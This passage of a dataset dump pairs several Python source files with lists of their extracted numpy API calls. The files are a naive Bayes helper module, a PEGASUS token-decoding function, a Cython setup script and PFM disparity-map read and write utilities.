((1108, 1128), 'numpy.arange', 'np.arange', (['(2 * 3 * 4)'], {}), '(2 * 3 * 4)\n', (1117, 1128), True, 'import numpy as np\n'), ((1289, 1302), 'numpy.arange', 'np.arange', (['(16)'], {}), '(16)\n', (1298, 1302), True, 'import numpy as np\n'), ((1490, 1503), 'numpy.arange', 'np.arange', (['(64)'], {}), '(64)\n', (1499, 1503), True, 'import numpy as np\n'), ((1798, 1811), 'numpy.arange', 'np.arange', (['(16)'], {}), '(16)\n', (1807, 1811), True, 'import 
numpy as np\n'), ((2108, 2121), 'numpy.arange', 'np.arange', (['(16)'], {}), '(16)\n', (2117, 2121), True, 'import numpy as np\n'), ((3061, 3073), 'numpy.arange', 'np.arange', (['(4)'], {}), '(4)\n', (3070, 3073), True, 'import numpy as np\n'), ((3295, 3307), 'numpy.arange', 'np.arange', (['(4)'], {}), '(4)\n', (3304, 3307), True, 'import numpy as np\n'), ((3715, 3728), 'numpy.arange', 'np.arange', (['(15)'], {}), '(15)\n', (3724, 3728), True, 'import numpy as np\n'), ((4010, 4023), 'numpy.arange', 'np.arange', (['(16)'], {}), '(16)\n', (4019, 4023), True, 'import numpy as np\n'), ((4979, 4991), 'numpy.arange', 'np.arange', (['(2)'], {}), '(2)\n', (4988, 4991), True, 'import numpy as np\n'), ((5269, 5281), 'numpy.arange', 'np.arange', (['(6)'], {}), '(6)\n', (5278, 5281), True, 'import numpy as np\n'), ((5613, 5625), 'numpy.arange', 'np.arange', (['(4)'], {}), '(4)\n', (5622, 5625), True, 'import numpy as np\n')] |
"""
<NAME> -- Student ID: 919519311
Assignment 3 -- February 2020
Implemented here is the low-level functionality of the
naive Bayes classifier. Defined below are four functions:
estimatePrior() computes the probability of each class
occurring in the validation set.
getNumClasses() gets the number of classes defined in
the data set, along with an array
of the class values themselves.
gaussian() returns the value of the Gaussian
probability density function, given
mean, standard deviation and an input value.
learnGreek() computes the mean and standard deviation
associated with a given training object.
Functions defined here are called in the Experiment.py file.
"""
import numpy as np
from collections import Counter
def estimatePrior(labels):
    """
    Estimate the prior probability of each class from its relative frequency.

    :param labels: ground truth labels for validation data
    :return: priors: Counter mapping each class label to its relative frequency
    """
    numObjects = np.size(labels)
    # Count class instances:
    priors = Counter(labels)
    # Normalize in place. Counter already holds every distinct class, so the
    # former O(n^2) getNumClasses() enumeration pass is unnecessary.
    for label in priors:
        priors[label] = priors[label] / numObjects
    return priors
def getNumClasses(labels):
    """
    Collect the distinct class labels in first-occurrence order.

    :param labels: ground truth labels for a data set
    :return: classes: array of class labels used (order of first appearance)
    :return: numClasses: number of classes in the data set
    """
    # dict.fromkeys preserves insertion order, giving an O(n)
    # first-occurrence dedupe instead of the former O(n^2) scan.
    ordered = dict.fromkeys(np.ravel(labels).tolist())
    if not ordered:
        # Keep the original empty-input contract: an empty int array.
        return np.array([], dtype=int), 0
    classes = np.array(list(ordered))
    return classes, len(ordered)
def gaussian(feature, mean, stdDev):
    """
    Evaluate the Gaussian probability density function.

    :param feature: single value taken by an attribute
    :param mean: mean value associated with the corresponding class
    :param stdDev: standard deviation associated with the corresponding class
    :return: output of Gaussian for naive Bayes classifier over continuous data
    """
    coefficient = 1.0 / (stdDev * np.sqrt(2.0 * np.pi))
    exponent = -np.square(feature - mean) / (2.0 * np.square(stdDev))
    return coefficient * np.exp(exponent)
def learnGreek(features):
    """
    Compute per-attribute mean and standard deviation for one class.

    :param features: sub-array of all features associated with a given class label
    :return: mean: array of mean values for all attributes
    :return: stdDev: array of standard deviation values for all attributes
    """
    # Vectorized column-wise reductions replace the former per-attribute
    # Python loop; results are identical float64 arrays of shape (n_attrs,).
    mean = np.mean(features, axis=0)
    # Clamp the standard deviation at 0.01 so the variance stays >= 0.0001,
    # preventing division blow-ups in the Gaussian density.
    stdDev = np.maximum(np.std(features, axis=0), 0.01)
    return mean, stdDev
| [
"numpy.size",
"numpy.std",
"numpy.square",
"numpy.zeros",
"numpy.append",
"numpy.mean",
"numpy.array",
"numpy.exp",
"collections.Counter",
"numpy.sqrt"
] | [((1159, 1174), 'numpy.size', 'np.size', (['labels'], {}), '(labels)\n', (1166, 1174), True, 'import numpy as np\n'), ((1218, 1233), 'collections.Counter', 'Counter', (['labels'], {}), '(labels)\n', (1225, 1233), False, 'from collections import Counter\n'), ((1614, 1637), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (1622, 1637), True, 'import numpy as np\n'), ((2801, 2826), 'numpy.size', 'np.size', (['features'], {'axis': '(1)'}), '(features, axis=1)\n', (2808, 2826), True, 'import numpy as np\n'), ((2839, 2862), 'numpy.zeros', 'np.zeros', (['numAttributes'], {}), '(numAttributes)\n', (2847, 2862), True, 'import numpy as np\n'), ((2876, 2899), 'numpy.zeros', 'np.zeros', (['numAttributes'], {}), '(numAttributes)\n', (2884, 2899), True, 'import numpy as np\n'), ((1695, 1710), 'numpy.size', 'np.size', (['labels'], {}), '(labels)\n', (1702, 1710), True, 'import numpy as np\n'), ((2504, 2518), 'numpy.exp', 'np.exp', (['exTerm'], {}), '(exTerm)\n', (2510, 2518), True, 'import numpy as np\n'), ((2954, 2977), 'numpy.mean', 'np.mean', (['features[:, i]'], {}), '(features[:, i])\n', (2961, 2977), True, 'import numpy as np\n'), ((2998, 3020), 'numpy.std', 'np.std', (['features[:, i]'], {}), '(features[:, i])\n', (3004, 3020), True, 'import numpy as np\n'), ((1736, 1752), 'numpy.size', 'np.size', (['classes'], {}), '(classes)\n', (1743, 1752), True, 'import numpy as np\n'), ((1890, 1919), 'numpy.append', 'np.append', (['classes', 'labels[i]'], {}), '(classes, labels[i])\n', (1899, 1919), True, 'import numpy as np\n'), ((2377, 2402), 'numpy.square', 'np.square', (['(feature - mean)'], {}), '(feature - mean)\n', (2386, 2402), True, 'import numpy as np\n'), ((2465, 2483), 'numpy.sqrt', 'np.sqrt', (['(2 * np.pi)'], {}), '(2 * np.pi)\n', (2472, 2483), True, 'import numpy as np\n'), ((2409, 2426), 'numpy.square', 'np.square', (['stdDev'], {}), '(stdDev)\n', (2418, 2426), True, 'import numpy as np\n')] |
# Copyright 2020 The PEGASUS Authors..
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Library for evaluating generative text models."""
import numpy as np
def ids2str(encoder, ids, num_reserved):
  """Decode an array of token ids into a text string.

  Args:
    encoder: text encoder exposing ``decode(list_of_ints) -> str``.
    ids: numpy array of token ids.
    num_reserved: number of reserved ids at the start of the vocabulary;
      falsy (0/None) disables all reserved-token handling.

  Returns:
    The decoded string. When ``num_reserved`` is set, the sequence is
    truncated at the first EOS id (id == 1) and each reserved id is
    rendered literally as "<id>" instead of being decoded.
  """
  if num_reserved:
    # Truncate at the first EOS token (id == 1).
    # NOTE(review): np.any(eos) is False when the only EOS sits at index 0,
    # so a leading EOS is not truncated — possibly intended eos.size;
    # confirm against upstream behavior before changing.
    eos = np.where(ids == 1)[0]
    if np.any(eos):
      ids = ids[:eos[0]]
    reserved_tokens = np.where(ids < num_reserved)[0]
    if reserved_tokens.size:
      # Split so every reserved id ends up in its own length-1 segment,
      # leaving runs of ordinary ids as larger segments for the encoder.
      split_locations = np.union1d(reserved_tokens, reserved_tokens + 1)
      ids_list = np.split(ids, split_locations)
      text_list = [
          "<%d>" %
          i if len(i) == 1 and i < num_reserved else encoder.decode(i.tolist())
          for i in ids_list
      ]
      return " ".join(text_list)
  return encoder.decode(ids.flatten().tolist())
| [
"numpy.any",
"numpy.where",
"numpy.union1d",
"numpy.split"
] | [((782, 793), 'numpy.any', 'np.any', (['eos'], {}), '(eos)\n', (788, 793), True, 'import numpy as np\n'), ((753, 771), 'numpy.where', 'np.where', (['(ids == 1)'], {}), '(ids == 1)\n', (761, 771), True, 'import numpy as np\n'), ((842, 870), 'numpy.where', 'np.where', (['(ids < num_reserved)'], {}), '(ids < num_reserved)\n', (850, 870), True, 'import numpy as np\n'), ((927, 975), 'numpy.union1d', 'np.union1d', (['reserved_tokens', '(reserved_tokens + 1)'], {}), '(reserved_tokens, reserved_tokens + 1)\n', (937, 975), True, 'import numpy as np\n'), ((993, 1023), 'numpy.split', 'np.split', (['ids', 'split_locations'], {}), '(ids, split_locations)\n', (1001, 1023), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
"""
Setup file for copa_map.
Use setup.cfg to configure your project.
This file was generated with PyScaffold 3.3.1.
PyScaffold helps you to put up the scaffold of your new Python project.
Learn more under: https://pyscaffold.org/
"""
import sys
from pkg_resources import VersionConflict, require
from setuptools import Extension, setup
from Cython.Build import cythonize
import numpy
# Cython extension for the Bresenham line-counting kernel; compiled with
# aggressive native optimization and OpenMP for parallel loops.
ext_modules = [
    Extension(
        "brescount",
        ["src/copa_map/util/brescount.pyx"],
        extra_compile_args=["-O3", "-ffast-math", "-march=native", "-fopenmp"],
        extra_link_args=['-fopenmp'],
        # NumPy C headers are needed to compile the .pyx module.
        include_dirs=[numpy.get_include()]
    )
]

# PyScaffold requires setuptools >= 38.3; abort early with a clear message
# instead of failing later with an obscure setup error.
try:
    require("setuptools>=38.3")
except VersionConflict:
    print("Error: version of setuptools is too old (<38.3)!")
    sys.exit(1)

if __name__ == "__main__":
    # Project metadata comes from setup.cfg via PyScaffold; cythonize()
    # translates the .pyx sources to C before building.
    setup(use_pyscaffold=True, ext_modules=cythonize(ext_modules))
| [
"pkg_resources.require",
"Cython.Build.cythonize",
"numpy.get_include",
"sys.exit"
] | [((707, 734), 'pkg_resources.require', 'require', (['"""setuptools>=38.3"""'], {}), "('setuptools>=38.3')\n", (714, 734), False, 'from pkg_resources import VersionConflict, require\n'), ((825, 836), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (833, 836), False, 'import sys\n'), ((909, 931), 'Cython.Build.cythonize', 'cythonize', (['ext_modules'], {}), '(ext_modules)\n', (918, 931), False, 'from Cython.Build import cythonize\n'), ((668, 687), 'numpy.get_include', 'numpy.get_include', ([], {}), '()\n', (685, 687), False, 'import numpy\n')] |
import os
import struct
import numpy as np
import cv2
def readPfm(filename):
    """Read a grayscale PFM ("Pf") file into a (height, width) float32 array.

    The PFM raster is stored bottom-up, so the first row in the file
    becomes the last row of the returned array.

    :param filename: path to the .pfm file
    :return: numpy float32 array of shape (height, width)
    """
    # 'with' guarantees the handle is closed even if parsing fails
    # (the original open()/close() pair leaked on exceptions).
    with open(filename, 'rb') as f:
        f.readline()  # format line; "Pf" means one sample per pixel
        items = f.readline().strip().split()
        width = int(items[0])
        height = int(items[1])
        # A negative scale factor marks little-endian samples.
        if float(f.readline().strip()) < 0:
            dtype = "<f4"
        else:
            dtype = ">f4"
        # Read the whole raster in one vectorized pass instead of the
        # former per-pixel struct.unpack loop.
        raster = np.frombuffer(f.read(height * width * 4), dtype=dtype)
    maps = raster.reshape(height, width).astype(np.float32)
    # File rows run bottom-up; flip to top-down and copy so the result is
    # a writable array (matching the original behavior).
    return np.flipud(maps).copy()
def parseCalib(filename):
    """Parse width, height and ndisp from a calibration file.

    Expects "width=...", "height=..." and "ndisp=..." on lines 5-7
    (0-based indices 4-6) of the file.

    :param filename: path to the calibration text file
    :return: (height, width, ndisp) as ints
    """
    # 'with' closes the file even if reading fails (the original
    # open()/close() pair leaked on exceptions).
    with open(filename, "r") as f:
        lines = f.readlines()

    def value_after_equals(line):
        # Return the text following the first '=' on the stripped line.
        stripped = line.strip()
        return stripped[stripped.find('=') + 1:]

    width = int(value_after_equals(lines[4]))
    height = int(value_after_equals(lines[5]))
    ndisp = int(value_after_equals(lines[6]))
    return height, width, ndisp
def normal(mean, std_dev):
    """Return a callable evaluating the normal pdf N(mean, std_dev**2).

    Both constants are precomputed once so repeated evaluations of the
    returned function only pay for the exponential.
    """
    scale = 1.0 / (np.sqrt(2.0 * np.pi) * std_dev)
    neg_inv_two_var = -1.0 / (2.0 * std_dev * std_dev)

    def pdf(x):
        return scale * np.exp(neg_inv_two_var * ((x - mean) ** 2))

    return pdf
def saveDisparity(disparity_map, filename):
    """Write a 2-D disparity map to an image file via OpenCV.

    :param disparity_map: 2-D array of disparities
    :param filename: output image path; format is inferred from the extension
    """
    # Only single-channel 2-D maps are accepted.
    assert len(disparity_map.shape) == 2
    # NOTE(review): cv2.imwrite converts/clips values to the target image
    # depth depending on the extension — confirm callers pass uint8/uint16
    # data or accept the conversion.
    cv2.imwrite(filename, disparity_map)
def writePfm(disparity_map, filename):
    """Write a 2-D disparity map as a little-endian grayscale PFM file.

    PFM stores the raster bottom-up, so rows are emitted in reverse order.

    :param disparity_map: 2-D array of disparities
    :param filename: output .pfm path
    """
    assert len(disparity_map.shape) == 2
    height, width = disparity_map.shape
    disparity_map = disparity_map.astype(np.float32)
    # 'with' guarantees the handle is closed even on error (the original
    # open()/close() pair leaked on exceptions).
    with open(filename, "wb") as o:
        # header: "Pf" (one sample per pixel), dimensions, negative scale
        # factor signalling little-endian samples
        o.write(b'Pf\n')
        o.write("{} {}\n".format(width, height).encode('utf-8'))
        o.write(b'-1.0\n')
        # raster: bottom-up rows as little-endian float32, written in one
        # vectorized pass instead of the former per-pixel struct.pack loop
        o.write(np.flipud(disparity_map).astype('<f4').tobytes())
def saveTimeFile(times, path):
    """Write a timing value to a text file.

    :param times: value to record (formatted with str())
    :param path: output file path
    """
    # 'with' guarantees the handle is closed even if the write fails
    # (the original open()/close() pair leaked on exceptions).
    with open(path, "w") as o:
        o.write("{}".format(times))
def testMk(dirName):
if not os.path.isdir(dirName):
os.mkdir(dirName)
def recurMk(path):
    """Create every directory level of *path*, anchored at the filesystem root.

    Note: the walk always starts at "/", so even a relative-looking path is
    created as an absolute one.
    """
    current = "/"
    for level in path.split("/"):
        current = os.path.join(current, level)
        testMk(current)
| [
"os.mkdir",
"os.path.join",
"os.path.isdir",
"cv2.imwrite",
"struct.unpack",
"struct.pack",
"numpy.exp",
"numpy.ndarray",
"numpy.sqrt"
] | [((431, 476), 'numpy.ndarray', 'np.ndarray', (['[height, width]'], {'dtype': 'np.float32'}), '([height, width], dtype=np.float32)\n', (441, 476), True, 'import numpy as np\n'), ((1327, 1363), 'cv2.imwrite', 'cv2.imwrite', (['filename', 'disparity_map'], {}), '(filename, disparity_map)\n', (1338, 1363), False, 'import cv2\n'), ((2046, 2068), 'os.path.isdir', 'os.path.isdir', (['dirName'], {}), '(dirName)\n', (2059, 2068), False, 'import os\n'), ((2078, 2095), 'os.mkdir', 'os.mkdir', (['dirName'], {}), '(dirName)\n', (2086, 2095), False, 'import os\n'), ((2201, 2227), 'os.path.join', 'os.path.join', (['prefix', 'item'], {}), '(prefix, item)\n', (2213, 2227), False, 'import os\n'), ((603, 629), 'struct.unpack', 'struct.unpack', (['fmt', 'sample'], {}), '(fmt, sample)\n', (616, 629), False, 'import struct\n'), ((1094, 1112), 'numpy.sqrt', 'np.sqrt', (['(2 * np.pi)'], {}), '(2 * np.pi)\n', (1101, 1112), True, 'import numpy as np\n'), ((1201, 1236), 'numpy.exp', 'np.exp', (['(constant2 * (x - mean) ** 2)'], {}), '(constant2 * (x - mean) ** 2)\n', (1207, 1236), True, 'import numpy as np\n'), ((1858, 1895), 'struct.pack', 'struct.pack', (['fmt', 'disparity_map[h, w]'], {}), '(fmt, disparity_map[h, w])\n', (1869, 1895), False, 'import struct\n')] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.